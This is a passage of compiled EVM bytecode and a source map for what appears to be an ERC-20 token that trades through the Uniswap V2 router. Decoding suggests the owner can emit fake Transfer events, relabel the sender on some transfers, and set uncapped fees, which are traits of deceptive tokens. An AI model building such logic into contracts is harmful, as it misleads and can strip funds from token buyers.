8181106107105761070f611aaf565b5b905060200201602081019061072591906117b6565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061078657610785611aaf565b5b9050602002013560405161079a919061159a565b60405180910390a380806001019150506106f2565b505050505050565b6003602052805f5260405f205f915090505481565b6060600180546107db90611865565b80601f016020809104026020016040519081016040528092919081815260200182805461080790611865565b80156108525780601f1061082957610100808354040283529160200191610852565b820191905f5260205f20905b81548152906001019060200180831161083557829003601f168201915b5050505050905090565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f61088d338484610b59565b905092915050565b61089d610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146108d3575f80fd5b600560159054906101000a900460ff16156108ec575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561094a573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061096e9190611af0565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109ce573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109f29190611af0565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b8152600401610a30929190611b1b565b602060405180830381865afa158015610a4b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a6f9190611af0565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600560156101000a81548160ff021916908315150217905550505050565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f80610b63610af1565b9050600560159054906101000a900460ff1680610bab57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610be157508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610be9575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c359190611a7c565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610ca55750600560149054906101000a900460ff16155b8015610d14575060646012600a610cbc91906119f1565b612710610cc99190611a3b565b610cd39190611b6f565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610d4c57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610f9a576001600560146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610d8857610d87611b9f565b5b604051908082528060200260200182016040528015610db65781602001602082028036833780820191505090505b50905030815f81518110610dcd57610dcc611aaf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e64573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e889190611af0565b81600181518110610e9c57610e9b611aaf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610f1691906119f1565b612710610f239190611a3b565b610f2d9190611b6f565b5f8430426040518663ffffffff1660e01b8152600401610f51959493929190611cc5565b5f604051808303815f87803b158015610f68575f80fd5b505af1158015610f7a573d5f803e3d5ffd5b505050505f600560146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015611013575060011515600560159054906101000a900460ff161515145b156110f4575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff16146110755783611077565b825b60ff16876110859190611a3b565b61108f9190611b6f565b9050808661109d9190611a7c565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110eb9190611d1d565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111409190611d1d565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1603611226578573ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051611219919061159a565b60405180910390a361136c565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036113055760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516112f8919061159a565b60405180910390a361136b565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051611362919061159a565b60405180910390a35b5b600193505050509392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113b1578082015181840152602081019050611396565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113d68261137a565b6113e08185611384565b93506113f0818560208601611394565b6113f9816113bc565b840191505092915050565b5f6020820190508181035f83015261141c81846113cc565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6114558261142c565b9050919050565b6114658161144b565b811461146f575f80fd5b50565b5f813590506114808161145c565b92915050565b5f819050919050565b61149881611486565b81146114a2575f80fd5b50565b5f813590506114b38161148f565b92915050565b5f80604083850312156114cf576114ce611424565b5b5f6114dc85828601611472565b92505060206114ed858286016114a5565b9150509250929050565b5f8115159050919050565b61150b816114f7565b82525050565b5f6020820190506115245f830184611502565b92915050565b5f60ff82169050919050565b61153f8161152a565b8114611549575f80fd5b50565b5f8135905061155a81611536565b92915050565b5f6020828403121561157557611574611424565b5b5f6115828482850161154c565b91505092915050565b61159481611486565b82525050565b5f6020820190506115ad5f83018461158b565b92915050565b5f805f606084860312156115ca576115c9611424565b5b5f6115d786828701611472565b93505060206115e886828701611472565b92505060406115f9868287016114a5565b9150509250925092565b61160c8161152a565b82525050565b5f6020820190506116255f830184611603565b92915050565b6116348161144b565b82525050565b5f60608201905061164d5f83018661162b565b61165a6020830185611603565b6116676040830184611603565b949350505050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116905761168f61166f565b5b8235905067ffffffffffffffff8111156116ad576116ac611673565b5b6020830191508360208202830111156116c9576116c8611677565b5b9250929050565b5f8083601f8401126116e5576116e461166f565b5b8235905067ffffffffffffffff81111561170257611701611673565b5b60208301915083602082028301111561171e5761171d611677565b5b9250929050565b5f805f805f6060868803121561173e5761173d611424565b5b5f61174b88828901611472565b955050602086013567ffffffffffffffff81111561176c5761176b611428565b5b6117788882890161167b565b9450945050604086013567ffffffffffffffff81111561179b5761179a611428565b5b6117a7888289016116d0565b92509250509295509295909350565b5f602082840312156117cb576117ca611424565b5b5f6117d884828501611472565b91505092915050565b5f6020820190506117f45f83018461162b565b92915050565b5f80604083850312156118105761180f611424565b5b5f61181d85828601611472565b925050602061182e85828601611472565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061187c57607f821691505b60208210810361188f5761188e611838565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115611917578086048111156118f3576118f2611895565b5b60018516156119025780820291505b8081029050611910856118c2565b94506118d7565b94509492505050565b5f8261192f57600190506119ea565b8161193c575f90506119ea565b8160018114611952576002811461195c5761198b565b60019150506119ea565b60ff84111561196e5761196d611895565b5b8360020a91508482111561198557611984611895565b5b506119ea565b5060208310610133831016604e8410600b84101617156119c05782820a9050838111156119bb576119ba611895565b5b6119ea565b6119cd84848460016118ce565b925090508184048111156119e4576119e3611895565b5b81810290505b9392505050565b5f6119fb82611486565b9150611a068361152a565b9250611a337fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611920565b905092915050565b5f611a4582611486565b9150611a5083611486565b9250828202611a5e81611486565b91508282048414831517611a7557611a74611895565b5b5092915050565b5f611a8682611486565b9150611a9183611486565b9250828203905081811115611aa957611aa8611895565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050611aea8161145c565b92915050565b5f60208284031215611b0557611b04611424565b5b5f611b1284828501611adc565b91505092915050565b5f604082019050611b2e5f83018561162b565b611b3b602083018461162b565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b7982611486565b9150611b8483611486565b925082611b9457611b93611b42565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f819050919050565b5f819050919050565b5f611bf8611bf3611bee84611bcc565b611bd5565b611486565b9050919050565b611c0881611bde565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611c408161144b565b82525050565b5f611c518383611c37565b60208301905092915050565b5f602082019050919050565b5f611c7382611c0e565b611c7d8185611c18565b9350611c8883611c28565b805f5b83811015611cb8578151611c9f8882611c46565b9750611caa83611c5d565b925050600181019050611c8b565b5085935050505092915050565b5f60a082019050611cd85f83018861158b565b611ce56020830187611bff565b8181036040830152611cf78186611c69565b9050611d06606083018561162b565b611d13608083018461158b565b9695505050505050565b5f611d2782611486565b9150611d3283611486565b9250828201905080821115611d4a57611d49611895565b5b9291505056fea2646970667358221220572acacf54e4a657828d3411ae1a6ffb0bfb31db22f9e5205af63c91cdac023864736f6c63430008180033

Deployed Bytecode Sourcemap

489:5482:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3978:91;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3626:207;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2177:174;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;640:61;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3395:223;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;598:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;817:26;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;2359:370;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1134:44;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4077:95;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1258:19;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3841:129;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3012:375;;;;;;;;;;;;;:::i;:::-;;1185:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3978:91;4023:13;4056:5;4049:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3978:91;:::o;3626:207::-;3694:4;3744:6;3711:9;:21;3721:10;3711:21;;;;;;;;;;;;;;;:30;3733:7;3711:30;;;;;;;;;;;;;;;:39;;;;3787:7;3766:37;;3775:10;3766:37;;;3796:6;3766:37;;;;;;:::i;:::-;;;;;;;;3821:4;3814:11;;3626:207;;;;:::o;2177:174::-;2251:29;:27;:29::i;:::-;2237:43;;:10;:43;;;2233:69;;2289:13;;;;;;;;;;;;;;2233:69;2313:30;2338:1;2341;2313:24;:30::i;:::-;2177:174;:::o;640:61::-;631:2;687;:14;;;;:::i;:::-;678:6;:23;;;;:::i;:::-;640:61;:::o;3395:223::-;3511:4;3559:6;3528:9;:15;3538:4;3528:15;;;;;;;;;;;;;;;:27;3544:10;3528:27;;;;;;;;;;;;;;;;:37;;;;;;;:::i;:::-;;;;;;;;3583:27;3593:4;3599:2;3603:6;3583:9;:27::i;:::-;3576:34;;3395:223;;;;;:::o;598:35::-;631:2;598:35;:::o;817:26::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;2359:370::-;2540:29;:27;:29::i;:::-;2526:43;;:10;:43;;;2522:69;;2578:13;;;;;;;;;;;;;;2522:69;2607:9;2602:120;2626:8;;:15;;2622:1;:19;2602:120;;;2686:8;;2695:1;2686:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2668:42;;2677:7;2668:42;;;2699:7;;2707:1;2699:10;;;;;;;:::i;:::-;;;;;;;;2668:42;;;;;;:::i;:::-;;;;;;;;2643:3;;;;;;;2602:120;;;;2359:370;;;;;:::o;1134:44::-;;;;;;;;;;;;;;;;;:::o;4077:95::-;4124:13;4157:7;4150:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4077:95;:::o;1258:19::-;;;;;;;;;;;;;:::o;3841:129::-;3905:4;3929:33;3939:10;3951:2;3955:6;3929:9;:33::i;:::-;3922:40;;3841:129;;;;:::o;3012:375::-;3077:29;:27;:29::i;:::-;3063:43;;:10;:43;;;3055:52;;;;;;3127:11;;;;;;;;;;;3126:12;3118:21;;;;;;3150:16;1359:42;3169:24;;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3150:45;;3206:13;1359:42;3222:21;;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3206:39;;3256:13;3288:8;3272:33;;;3314:4;3321:5;3272:55;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3256:71;;3345:5;3338:4;;:12;;;;;;;;;;;;;;;;;;3375:4;3361:11;;:18;;;;;;;;;;;;;;;;;;3044:343;;;3012:375::o;1185:64::-;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;2890:114::-;2951:7;2978:9;:18;;;;;;;;;;;;2971:25;;2890:114;:::o;2737:145::-;2834:4;2815:9;:16;;;:23;;;;;;;;;;;;;;;;;;2869:5;2849:9;:17;;;:25;;;;;;;;;;;;;;;;;;2737:145;;:::o;4329:1639::-;4442:4;4459:16;4478:29;:27;:29::i;:::-;4459:48;;4526:11;;;;;;;;;;;:31;;;;4549:8;4541:16;;:4;:16;;;4526:31;:49;;;;4567:8;4561:14;;:2;:14;;;4526:49;4518:58;;;;;;4608:6;4589:9;:15;4599:4;4589:15;;;;;;;;;;;;;;;;:25;;;;;;;:::i;:::-;;;;;;;;4651:4;;;;;;;;;;;4645:10;;:2;:10;;;:36;;;;;4673:8;;;;;;;;;;;4672:9;4645:36;:91;;;;;894:3;631:2;687;:14;;;;:::i;:::-;678:6;:23;;;;:::i;:::-;880:17;;;;:::i;:::-;4698:9;:24;4716:4;4698:24;;;;;;;;;;;;;;;;:38;;4645:91;:124;;;;;4761:8;4753:16;;:4;:16;;;;4645:124;4627:650;;;4807:4;4796:8;;:15;;;;;;;;;;;;;;;;;;4826:21;4864:1;4850:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4826:40;;4899:4;4881;4886:1;4881:7;;;;;;;;:::i;:::-;;;;;;;:23;;;;;;;;;;;1359:42;4929:21;;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4919:4;4924:1;4919:7;;;;;;;;:::i;:::-;;;;;;;:33;;;;;;;;;;;1359:42;4967:88;;;894:3;631:2;687;:14;;;;:::i;:::-;678:6;:23;;;;:::i;:::-;880:17;;;;:::i;:::-;5111:1;5135:4;5170;5198:15;4967:265;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5260:5;5249:8;;:16;;;;;;;;;;;;;;;;;;4781:496;4627:650;5290:13;5305:14;5324:9;:16;;;;;;;;;;;;5342:9;:17;;;;;;;;;;;;5289:71;;;;5391:4;5375:21;;:4;:21;;;;:44;;;;;5415:4;5400:19;;:11;;;;;;;;;;;:19;;;5375:44;5371:280;;;5436:27;5530:3;5500:4;;;;;;;;;;;5494:10;;:2;:10;;;:31;;5518:7;5494:31;;;5507:8;5494:31;5467:59;;:6;:59;;;;:::i;:::-;5466:67;;;;:::i;:::-;5436:97;;5558:19;5548:29;;;;;:::i;:::-;;;5620:19;5592:9;:24;5610:4;5592:24;;;;;;;;;;;;;;;;:47;;;;;;;:::i;:::-;;;;;;;;5421:230;5371:280;5678:6;5661:9;:13;5671:2;5661:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;5709:9;;;;;;;;;;;5701:17;;:4;:17;;;5697:242;;5760:2;5740:31;;5749:9;;;;;;;;;;;5740:31;;;5764:6;5740:31;;;;;;:::i;:::-;;;;;;;;5697:242;;;5799:9;;;;;;;;;;;5793:15;;:2;:15;;;5789:150;;5845:9;;;;;;;;;;;5830:33;;5839:4;5830:33;;;5856:6;5830:33;;;;;;:::i;:::-;;;;;;;;5789:150;;;5916:2;5901:26;;5910:4;5901:26;;;5920:6;5901:26;;;;;;:::i;:::-;;;;;;;;5789:150;5697:242;5956:4;5949:11;;;;;4329:1639;;;;;:::o;7:99:13:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:86::-;3481:7;3521:4;3514:5;3510:16;3499:27;;3446:86;;;:::o;3538:118::-;3609:22;3625:5;3609:22;:::i;:::-;3602:5;3599:33;3589:61;;3646:1;3643;3636:12;3589:61;3538:118;:::o;3662:135::-;3706:5;3744:6;3731:20;3722:29;;3760:31;3785:5;3760:31;:::i;:::-;3662:135;;;;:::o;3803:325::-;3860:6;3909:2;3897:9;3888:7;3884:23;3880:32;3877:119;;;3915:79;;:::i;:::-;3877:119;4035:1;4060:51;4103:7;4094:6;4083:9;4079:22;4060:51;:::i;:::-;4050:61;;4006:115;3803:325;;;;:::o;4134:118::-;4221:24;4239:5;4221:24;:::i;:::-;4216:3;4209:37;4134:118;;:::o;4258:222::-;4351:4;4389:2;4378:9;4374:18;4366:26;;4402:71;4470:1;4459:9;4455:17;4446:6;4402:71;:::i;:::-;4258:222;;;;:::o;4486:619::-;4563:6;4571;4579;4628:2;4616:9;4607:7;4603:23;4599:32;4596:119;;;4634:79;;:::i;:::-;4596:119;4754:1;4779:53;4824:7;4815:6;4804:9;4800:22;4779:53;:::i;:::-;4769:63;;4725:117;4881:2;4907:53;4952:7;4943:6;4932:9;4928:22;4907:53;:::i;:::-;4897:63;;4852:118;5009:2;5035:53;5080:7;5071:6;5060:9;5056:22;5035:53;:::i;:::-;5025:63;;4980:118;4486:619;;;;;:::o;5111:112::-;5194:22;5210:5;5194:22;:::i;:::-;5189:3;5182:35;5111:112;;:::o;5229:214::-;5318:4;5356:2;5345:9;5341:18;5333:26;;5369:67;5433:1;5422:9;5418:17;5409:6;5369:67;:::i;:::-;5229:214;;;;:::o;5449:118::-;5536:24;5554:5;5536:24;:::i;:::-;5531:3;5524:37;5449:118;;:::o;5573:426::-;5714:4;5752:2;5741:9;5737:18;5729:26;;5765:71;5833:1;5822:9;5818:17;5809:6;5765:71;:::i;:::-;5846:68;5910:2;5899:9;5895:18;5886:6;5846:68;:::i;:::-;5924;5988:2;5977:9;5973:18;5964:6;5924:68;:::i;:::-;5573:426;;;;;;:::o;6005:117::-;6114:1;6111;6104:12;6128:117;6237:1;6234;6227:12;6251:117;6360:1;6357;6350:12;6391:568;6464:8;6474:6;6524:3;6517:4;6509:6;6505:17;6501:27;6491:122;;6532:79;;:::i;:::-;6491:122;6645:6;6632:20;6622:30;;6675:18;6667:6;6664:30;6661:117;;;6697:79;;:::i;:::-;6661:117;6811:4;6803:6;6799:17;6787:29;;6865:3;6857:4;6849:6;6845:17;6835:8;6831:32;6828:41;6825:128;;;6872:79;;:::i;:::-;6825:128;6391:568;;;;;:::o;6982:::-;7055:8;7065:6;7115:3;7108:4;7100:6;7096:17;7092:27;7082:122;;7123:79;;:::i;:::-;7082:122;7236:6;7223:20;7213:30;;7266:18;7258:6;7255:30;7252:117;;;7288:79;;:::i;:::-;7252:117;7402:4;7394:6;7390:17;7378:29;;7456:3;7448:4;7440:6;7436:17;7426:8;7422:32;7419:41;7416:128;;;7463:79;;:::i;:::-;7416:128;6982:568;;;;;:::o;7556:1079::-;7687:6;7695;7703;7711;7719;7768:2;7756:9;7747:7;7743:23;7739:32;7736:119;;;7774:79;;:::i;:::-;7736:119;7894:1;7919:53;7964:7;7955:6;7944:9;7940:22;7919:53;:::i;:::-;7909:63;;7865:117;8049:2;8038:9;8034:18;8021:32;8080:18;8072:6;8069:30;8066:117;;;8102:79;;:::i;:::-;8066:117;8215:80;8287:7;8278:6;8267:9;8263:22;8215:80;:::i;:::-;8197:98;;;;7992:313;8372:2;8361:9;8357:18;8344:32;8403:18;8395:6;8392:30;8389:117;;;8425:79;;:::i;:::-;8389:117;8538:80;8610:7;8601:6;8590:9;8586:22;8538:80;:::i;:::-;8520:98;;;;8315:313;7556:1079;;;;;;;;:::o;8641:329::-;8700:6;8749:2;8737:9;8728:7;8724:23;8720:32;8717:119;;;8755:79;;:::i;:::-;8717:119;8875:1;8900:53;8945:7;8936:6;8925:9;8921:22;8900:53;:::i;:::-;8890:63;;8846:117;8641:329;;;;:::o;8976:222::-;9069:4;9107:2;9096:9;9092:18;9084:26;;9120:71;9188:1;9177:9;9173:17;9164:6;9120:71;:::i;:::-;8976:222;;;;:::o;9204:474::-;9272:6;9280;9329:2;9317:9;9308:7;9304:23;9300:32;9297:119;;;9335:79;;:::i;:::-;9297:119;9455:1;9480:53;9525:7;9516:6;9505:9;9501:22;9480:53;:::i;:::-;9470:63;;9426:117;9582:2;9608:53;9653:7;9644:6;9633:9;9629:22;9608:53;:::i;:::-;9598:63;;9553:118;9204:474;;;;;:::o;9684:180::-;9732:77;9729:1;9722:88;9829:4;9826:1;9819:15;9853:4;9850:1;9843:15;9870:320;9914:6;9951:1;9945:4;9941:12;9931:22;;9998:1;9992:4;9988:12;10019:18;10009:81;;10075:4;10067:6;10063:17;10053:27;;10009:81;10137:2;10129:6;10126:14;10106:18;10103:38;10100:84;;10156:18;;:::i;:::-;10100:84;9921:269;9870:320;;;:::o;10196:180::-;10244:77;10241:1;10234:88;10341:4;10338:1;10331:15;10365:4;10362:1;10355:15;10382:102;10424:8;10471:5;10468:1;10464:13;10443:34;;10382:102;;;:::o;10490:848::-;10551:5;10558:4;10582:6;10573:15;;10606:5;10597:14;;10620:712;10641:1;10631:8;10628:15;10620:712;;;10736:4;10731:3;10727:14;10721:4;10718:24;10715:50;;;10745:18;;:::i;:::-;10715:50;10795:1;10785:8;10781:16;10778:451;;;11210:4;11203:5;11199:16;11190:25;;10778:451;11260:4;11254;11250:15;11242:23;;11290:32;11313:8;11290:32;:::i;:::-;11278:44;;10620:712;;;10490:848;;;;;;;:::o;11344:1073::-;11398:5;11589:8;11579:40;;11610:1;11601:10;;11612:5;;11579:40;11638:4;11628:36;;11655:1;11646:10;;11657:5;;11628:36;11724:4;11772:1;11767:27;;;;11808:1;11803:191;;;;11717:277;;11767:27;11785:1;11776:10;;11787:5;;;11803:191;11848:3;11838:8;11835:17;11832:43;;;11855:18;;:::i;:::-;11832:43;11904:8;11901:1;11897:16;11888:25;;11939:3;11932:5;11929:14;11926:40;;;11946:18;;:::i;:::-;11926:40;11979:5;;;11717:277;;12103:2;12093:8;12090:16;12084:3;12078:4;12075:13;12071:36;12053:2;12043:8;12040:16;12035:2;12029:4;12026:12;12022:35;12006:111;12003:246;;;12159:8;12153:4;12149:19;12140:28;;12194:3;12187:5;12184:14;12181:40;;;12201:18;;:::i;:::-;12181:40;12234:5;;12003:246;12274:42;12312:3;12302:8;12296:4;12293:1;12274:42;:::i;:::-;12259:57;;;;12348:4;12343:3;12339:14;12332:5;12329:25;12326:51;;;12357:18;;:::i;:::-;12326:51;12406:4;12399:5;12395:16;12386:25;;11344:1073;;;;;;:::o;12423:281::-;12481:5;12505:23;12523:4;12505:23;:::i;:::-;12497:31;;12549:25;12565:8;12549:25;:::i;:::-;12537:37;;12593:104;12630:66;12620:8;12614:4;12593:104;:::i;:::-;12584:113;;12423:281;;;;:::o;12710:410::-;12750:7;12773:20;12791:1;12773:20;:::i;:::-;12768:25;;12807:20;12825:1;12807:20;:::i;:::-;12802:25;;12862:1;12859;12855:9;12884:30;12902:11;12884:30;:::i;:::-;12873:41;;13063:1;13054:7;13050:15;13047:1;13044:22;13024:1;13017:9;12997:83;12974:139;;13093:18;;:::i;:::-;12974:139;12758:362;12710:410;;;;:::o;13126:194::-;13166:4;13186:20;13204:1;13186:20;:::i;:::-;13181:25;;13220:20;13238:1;13220:20;:::i;:::-;13215:25;;13264:1;13261;13257:9;13249:17;;13288:1;13282:4;13279:11;13276:37;;;13293:18;;:::i;:::-;13276:37;13126:194;;;;:::o;13326:180::-;13374:77;13371:1;13364:88;13471:4;13468:1;13461:15;13495:4;13492:1;13485:15;13512:143;13569:5;13600:6;13594:13;13585:22;;13616:33;13643:5;13616:33;:::i;:::-;13512:143;;;;:::o;13661:351::-;13731:6;13780:2;13768:9;13759:7;